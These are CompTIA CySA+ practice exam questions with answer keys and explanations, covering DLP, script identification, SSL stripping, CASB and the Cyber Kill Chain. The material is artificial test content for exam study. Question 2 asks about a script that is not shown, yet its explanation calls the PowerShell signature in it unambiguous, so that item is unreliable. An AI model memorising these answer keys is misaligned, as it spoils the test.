Security Operations for CompTIA CySA+

Sample Practice Questions

1. Question 1

   Which of the following tools would work best to prevent the exposure of PII outside of an organization?
   1. A. PAM
   2. B. IDS
   3. C. PKI
   4. D. DLP
   Explanation

   The correct answer is: D. DLP.

   DLP is the right tool to prevent the exposure of PII outside the organization. Data loss prevention products inspect content in motion and at rest, identify PII against organizational policies, and block or quarantine transfers that violate policy — exactly the PII-exposure prevention the question is asking about. PAM controls privileged account access. IDS detects intrusion patterns but does not stop data movement. PKI is the public-key infrastructure for encryption and signing. DLP is the data-exfiltration prevention answer.

2. Question 2

   A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script: Which of the following scripting languages was used in the script?
   1. A. PowerShell
   2. B. Ruby
   3. C. Python
   4. D. Shell script
   Explanation

   The correct answer is: A. PowerShell.

   The script is PowerShell based on its syntax. PowerShell uses distinctive features such as $-prefixed variables, the cmdlet verb-noun naming convention (Get-Item, Invoke-WebRequest), pipeline objects, and the .ps1 file extension that together identify it. Ruby uses end keywords and different syntax. Python uses colons and indentation. Shell script (bash/sh) uses different built-ins and variable handling. The PowerShell signature is unambiguous in the script. The mapping of this scenario to the CySA+ objectives is direct, and the control behaviors described align with the named answer in the way the scoring rubric expects the analyst to recognize.

3. Question 3

   A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?
   1. A. There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access
   2. B. An on-path attack is being performed by someone with internal access that forces users into port 80
   3. C. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
   4. D. An error was caused by BGP due to new rules applied over the company's internal routers
   Explanation

   The correct answer is: B. An on-path attack is being performed by someone with internal access that forces users into port 80.

   An on-path attack is being performed by someone with internal access that forces users into port 80. The combination of compromised accounts and the portal sometimes being accessible only through HTTP is the signature of an SSL-strip on-path (formerly man-in-the-middle) attack — the attacker degrades connections from HTTPS to HTTP to intercept credentials. A simple SSL certificate issue would cause HTTPS to fail entirely rather than intermittently redirect to HTTP. Web server load issues do not typically downgrade connections from HTTPS to HTTP. A BGP rule error would more typically cause connectivity failures, not protocol downgrades. The on-path-strip pattern fits.

4. Question 4

   The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?
   1. A. Deploy a CASB and enable policy enforcement
   2. B. Configure MFA with strict access
   3. C. Deploy an API gateway
   4. D. Enable SSO to the cloud applications
   Explanation

   The correct answer is: A. Deploy a CASB and enable policy enforcement.

   Deploying a CASB and enabling policy enforcement will assist in reducing shadow IT. A cloud access security broker discovers cloud applications in use across the organization, evaluates their risk, and enforces policy on access — for example, blocking high-risk applications or applying additional controls. Configuring MFA with strict access secures authentication but does not discover or restrict shadow IT applications. Deploying an API gateway controls API traffic but does not address user-driven cloud-app adoption. Enabling SSO simplifies authentication for sanctioned applications but does not discover or block unsanctioned ones. CASB is the shadow-IT control.

5. Question 5

   A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?
   1. A. Weaponization
   2. B. Reconnaissance
   3. C. Delivery
   4. D. Exploitation
   Explanation

   The correct answer is: D. Exploitation.

   The attacker is currently operating in the exploitation phase. Exploitation is the kill-chain phase where the attacker has successfully bypassed defenses (in this case via social engineering) to gain access to the target. The actor wanting to maintain access for continued attack means they have already exploited the trust and are in the system. Weaponization is preparing the payload before delivery. Reconnaissance is target identification. Delivery is placing the payload on the target. The 'successful social engineering and gained access' description aligns with exploitation, not the subsequent installation/persistence phase (which is sometimes called Installation in the original kill chain).

Other CompTIA CySA+ domains

• Incident Response Management (90 questions)
• Reporting and Communication (29 questions)
• Vulnerability Management (108 questions)